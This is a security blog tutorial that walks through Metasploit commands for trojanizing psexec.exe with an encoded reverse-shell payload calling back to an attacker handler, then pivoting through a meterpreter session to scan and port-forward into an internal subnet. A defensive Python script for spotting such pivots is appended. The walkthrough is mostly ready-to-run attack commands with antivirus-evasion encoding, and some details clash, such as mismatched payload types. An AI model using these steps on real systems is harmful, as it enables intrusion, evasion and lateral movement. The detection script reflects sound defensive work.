pbnetworks - Computer Security Solutions

03/15/11 Meterpreter encoding & pivot

In this tutorial I use the Back|Track distro and Metasploit to encode psexec.exe and then copy it over to a fully patched Windows XP box. We can get our executable onto the victim machine a number of ways; I will save that for later. The steps involved in using Metasploit are listed below and shown in the video.

# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.132 LPORT=4444 R | msfencode -c 10 -e x86/shikata_ga_nai -x /root/psexec.exe -t exe > psexec3.exe
# msfconsole
msf> use multi/handler
msf> set payload windows/meterpreter/reverse_tcp
msf> set LPORT 4444
msf> set LHOST 192.168.1.132
msf> exploit
meterpreter> ipconfig
    (this listed two network interfaces: 192.168.1.134 and 192.168.15.2)
meterpreter> run arp_scanner -h
    (prints the help for the script)
meterpreter> run arp_scanner -r 192.168.15.1/24
meterpreter> background
msf> route add 192.168.15.1 255.255.255.0 1
    (the trailing 1 is the ID of the meterpreter session the route goes through)
msf> route print
msf> use auxiliary/scanner/portscan/tcp
msf> set RHOSTS 192.168.15.1, 192.168.15.3
    (these IPs came from the arp scan we did earlier)
msf> set PORTS 1-200
    (you can set this to whatever range you like, but larger ranges take time)
msf> run
    (now you have a list of open ports on each host that you can exploit)
msf> back
msf> sessions -i 1
meterpreter> portfwd add -l 8000 -p 80 -r 192.168.15.3
meterpreter> portfwd add -l 8080 -p 80 -r 192.168.15.1

Then open Firefox to http://127.0.0.1:8000 and http://127.0.0.1:8080.

Now we have been able to view two systems internal to the network by pivoting through the meterpreter payload. The scan we did went through 192.168.1.134 > 192.168.15.2 > 192.168.15.1 & 192.168.15.3. We then used the portfwd command to display the internal web pages locally over SSL.
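From the defender's side, the pattern this walkthrough relies on is visible in flow logs: a dual-homed host holds an outbound session to an address outside the internal segment while fanning out to many internal hosts and ports (arp_scanner and portscan/tcp traffic that arrives from the pivot's second interface). The script below is an added example, not part of the original post; the host inventory, addresses and flow records are constructed to mirror the topology above.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed inventory: which host owns which interface. The pivot box in the
# walkthrough is dual-homed on 192.168.1.134 and 192.168.15.2.
HOST_OF = {
    "192.168.1.134": "winxp-pivot", "192.168.15.2": "winxp-pivot",
    "192.168.15.4": "desk-04",
}
INTERNAL_NET = ip_network("192.168.15.0/24")  # segment reachable only via the pivot
FANOUT_THRESHOLD = 20                          # distinct (dst, port) targets per host

# Constructed flow records: (src_ip, dst_ip, dst_port). The first is the
# reverse_tcp session back to the handler; the generated lines mimic
# portscan/tcp walking ports 1-20 on 192.168.15.1 and .3 through the pivot.
FLOWS = [("192.168.1.134", "192.168.1.132", 4444)]
FLOWS += [("192.168.15.2", f"192.168.15.{h}", p) for h in (1, 3) for p in range(1, 21)]
FLOWS += [("192.168.15.4", "192.168.15.1", 80)]  # ordinary browsing, not a pivot


def find_pivot_candidates(flows, host_of=HOST_OF, threshold=FANOUT_THRESHOLD):
    """Return {host: (external_peer, fanout)} for hosts that both hold an
    outbound session to a peer outside INTERNAL_NET and reach at least
    `threshold` distinct internal (dst, port) pairs. Flows are keyed by the
    owning host so both interfaces of a dual-homed box count together."""
    sessions = {}              # host -> "peer:port" outside the internal net
    fanout = defaultdict(set)  # host -> {(dst, port), ...} inside the internal net
    for src, dst, dport in flows:
        host = host_of.get(src, src)
        if ip_address(dst) in INTERNAL_NET:
            fanout[host].add((dst, dport))
        else:
            sessions[host] = f"{dst}:{dport}"
    return {h: (sessions[h], len(fanout[h]))
            for h in sessions if len(fanout[h]) >= threshold}


if __name__ == "__main__":
    for host, (peer, n) in find_pivot_candidates(FLOWS).items():
        print(f"possible pivot: {host} holds a session to {peer} and probed {n} internal targets")
```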

Copyright © 2024 pbnetworks. All Rights Reserved.